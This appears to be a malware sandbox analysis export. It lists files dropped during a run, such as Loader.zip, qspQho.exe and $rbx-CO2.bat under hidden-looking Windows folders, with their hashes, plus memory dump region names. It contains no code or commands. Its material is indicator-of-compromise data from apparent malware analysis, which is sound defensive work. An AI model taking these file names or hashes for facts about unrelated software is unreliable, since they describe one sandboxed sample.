4e3692a16126b4882338fe9062689db8042cf6fa1fee035cab2eaea14f9d6d45f0ea13bd34e3617d871cb48a5a7233711e0048752c4062b1c6d6184793a860f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
17875a389a00551cc4aa5c9a9e2f0420

SHA1
7ccf428ba1b854742435a713da364bea83d92121

SHA256
d9cf3289a035deacdaed51f34cc5b4e53e782fbbd72abe256db2f29f3d49adf7

SHA512
6789da40581223ce3267576d197b780d339a9c3acfcf822ba0e10b80664d180834e1969fd06e1e8f37da29c5bf3d8626d56a69b1f146d1be7281d5d80b5dd711

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000007

Filesize
20KB

MD5
e8e1f8273c10625d8b5e1541f8cab8fd

SHA1
18d7a3b3362fc592407e5b174a8fb60a128ce544

SHA256
45870d39eb491375c12251d35194e916ace795b1a67e02841e1bbcb14f1a0e44

SHA512
ca77d40ec247d16bc50302f8b13c79b37ab1fcf81c1f8ab50f2fc5430d4fabc74f5845c781bd11bb55840184e6765c2f18b28af72e1f7800fe0bb0b1f3f23b24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d22257c59abc35a50084ea1524e580b3

SHA1
c6568dd8a8a51d5a7bb3bc76c463750075686199

SHA256
1924c5bf930f289376a41d04cb84bc9f4d617b03fe11ec5b43ebc8cabd57d4ee

SHA512
d16e4423dc3e8b584937d364d3e5f1726c4a3c22e6314e59e70277b6beed7dd2b49b5cd4de8593e02147a70da0ac95213939f94a6fab15009644b6d8946590d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
26ff85c70214a2de8f3448e5f3133433

SHA1
df8ff7f1adc315eaeb297a2f5865895b7f1a6b71

SHA256
21db5a1d5b82146212c4d228a77de302bbac66c568e5f87ebe5c54c7257d08a8

SHA512
92d55bee7fd2adee6af450900efaea526357bda6612391a26efdfc6fe138cae437e1d47893c7ed4877a68582dcf5badb7a8ebc08c535a682b2a947eff80ede53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d93a00bab3798807736ba56d47e2f70b

SHA1
ff138fe4d96e7cfc553d4e0b1b23b81334d5ecf6

SHA256
f0561ad5aad76f4c0237bc5259ccc893b0d156e859c1f6582366b9a545f20424

SHA512
1a20862d883d63245854315f8142a8bed3500117dd038ab85aa1218dd10625d075914b59df7a456dade7eba6819db87a8e063ccefd87912dc17f7ee32db58d52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pl5r0qop.bta.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Loader.zip

Filesize
5.5MB

MD5
15988ddd4ef8523823cb8670ec3c9fe8

SHA1
70509c9287dd990ab039c883a9b21ec76975aec7

SHA256
0234a78acc9fd066d5e8ecc660497e92b88c8ccdb4f30527b992a56a8132a781

SHA512
d815dd3da903409d9bfad9048af67c3d8595ea04a9d9ab79d41b741bd70f13f75854e5e732e3dd9457a9ad694f6b55618bd8daf7bc295e4bab5b48c74cdf309e

Download Submit
C:\Windows\$nya-onimai2\qspQho.exe

Filesize
36KB

MD5
b943a57bdf1bbd9c33ab0d33ff885983

SHA1
1cee65eea1ab27eae9108c081e18a50678bd5cdc

SHA256
878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4

SHA512
cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c

Download Submit
C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Filesize
7.3MB

MD5
1bec1098946595a03fa067a3ef7ce292

SHA1
89cfb4a2f8800f1b944d906d959639907672317d

SHA256
a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb

SHA512
dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082

Download Submit
memory/332-182-0x0000020A927D0000-0x0000020A927FA000-memory.dmp

Filesize
168KB

Download
memory/612-143-0x000002BFA07A0000-0x000002BFA07CA000-memory.dmp

Filesize
168KB

Download
memory/612-139-0x000002BFA07A0000-0x000002BFA07CA000-memory.dmp

Filesize
168KB

Download
memory/612-140-0x000002BFA07A0000-0x000002BFA07CA000-memory.dmp

Filesize
168KB

Download
memory/612-141-0x000002BFA07A0000-0x000002BFA07CA000-memory.dmp

Filesize
168KB

Download
memory/612-142-0x000002BFA07A0000-0x000002BFA07CA000-memory.dmp

Filesize
168KB

Download
memory/612-133-0x000002BFA07A0000-0x000002BFA07CA000-memory.dmp

Filesize
168KB

Download
memory/612-146-0x000002BFA07A0000-0x000002BFA07CA000-memory.dmp

Filesize
168KB

Download
memory/612-145-0x00007FF7C53F0000-0x00007FF7C5400000-memory.dmp

Filesize
64KB

Download
memory/612-132-0x000002BFA0770000-0x000002BFA0794000-memory.dmp

Filesize
144KB

Download
memory/612-134-0x000002BFA07A0000-0x000002BFA07CA000-memory.dmp

Filesize
168KB

Download
memory/612-144-0x00007FFFADEB0000-0x00007FFFADEC0000-memory.dmp

Filesize
64KB

Download
memory/668-150-0x000001C9A1A70000-0x000001C9A1A9A000-memory.dmp

Filesize
168KB

Download
memory/668-162-0x000001C9A1A70000-0x000001C9A1A9A000-memory.dmp

Filesize
168KB

Download
memory/668-160-0x00007FFFADEB0000-0x00007FFFADEC0000-memory.dmp

Filesize
64KB

Download
memory/668-155-0x000001C9A1A70000-0x000001C9A1A9A000-memory.dmp

Filesize
168KB

Download
memory/668-156-0x000001C9A1A70000-0x000001C9A1A9A000-memory.dmp

Filesize
168KB

Download
memory/668-157-0x000001C9A1A70000-0x000001C9A1A9A000-memory.dmp

Filesize
168KB

Download
memory/668-158-0x000001C9A1A70000-0x000001C9A1A9A000-memory.dmp

Filesize
168KB

Download
memory/668-159-0x000001C9A1A70000-0x000001C9A1A9A000-memory.dmp

Filesize
168KB

Download
memory/668-161-0x00007FF7C53F0000-0x00007FF7C5400000-memory.dmp

Filesize
64KB

Download
memory/960-175-0x000002D042FD0000-0x000002D042FFA000-memory.dmp

Filesize
168KB

Download
memory/960-166-0x000002D042FD0000-0x000002D042FFA000-memory.dmp

Filesize
168KB

Download
memory/960-171-0x000002D042FD0000-0x000002D042FFA000-memory.dmp

Filesize
168KB

Download
memory/960-172-0x000002D042FD0000-0x000002D042FFA000-memory.dmp

Filesize
168KB

Download
memory/960-173-0x000002D042FD0000-0x000002D042FFA000-memory.dmp

Filesize
168KB

Download
memory/960-174-0x000002D042FD0000-0x000002D042FFA000-memory.dmp

Filesize
168KB

Download
memory/960-176-0x00007FFFADEB0000-0x00007FFFADEC0000-memory.dmp

Filesize
64KB

Download
memory/960-177-0x00007FF7C53F0000-0x00007FF7C5400000-memory.dmp

Filesize
64KB

Download
memory/960-178-0x000002D042FD0000-0x000002D042FFA000-memory.dmp

Filesize
168KB

Download
memory/3200-2808-0x00000167CA9E0000-0x00000167CABA2000-memory.dmp

Filesize
1.8MB

Download
memory/3200-2807-0x00000167C7AD0000-0x00000167C7B82000-memory.dmp

Filesize
712KB

Download
memory/3200-2806-0x00000167C79C0000-0x00000167C7A10000-memory.dmp

Filesize
320KB

Download
memory/3200-2715-0x00000167C9910000-0x00000167CA094000-memory.dmp

Filesize
7.5MB

Download
memory/5268-107-0x0000025735460000-0x00000257354D6000-memory.dmp

Filesize
472KB

Download
memory/5268-106-0x0000025735030000-0x0000025735074000-memory.dmp

Filesize
272KB

Download
memory/5268-105-0x0000025734FB0000-0x0000025734FD2000-memory.dmp

Filesize
136KB

Download
memory/5268-1001-0x0000025755D90000-0x0000025756122000-memory.dmp

Filesize
3.6MB

Download
memory/5268-108-0x000002571CBB0000-0x000002571CBEA000-memory.dmp

Filesize
232KB

Download
memory/5268-119-0x00007FF805370000-0x00007FF805565000-memory.dmp

Filesize
2.0MB

Download
memory/5268-120-0x00007FF803AA0000-0x00007FF803B5E000-memory.dmp

Filesize
760KB

Download
memory/5268-109-0x0000025755740000-0x0000025755B86000-memory.dmp

Filesize
4.3MB

Download
memory/5480-121-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5480-123-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5480-124-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5480-127-0x00007FF805370000-0x00007FF805565000-memory.dmp

Filesize
2.0MB

Download
memory/5480-128-0x00007FF803AA0000-0x00007FF803B5E000-memory.dmp

Filesize
760KB

Download
memory/5480-126-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5480-129-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5480-122-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download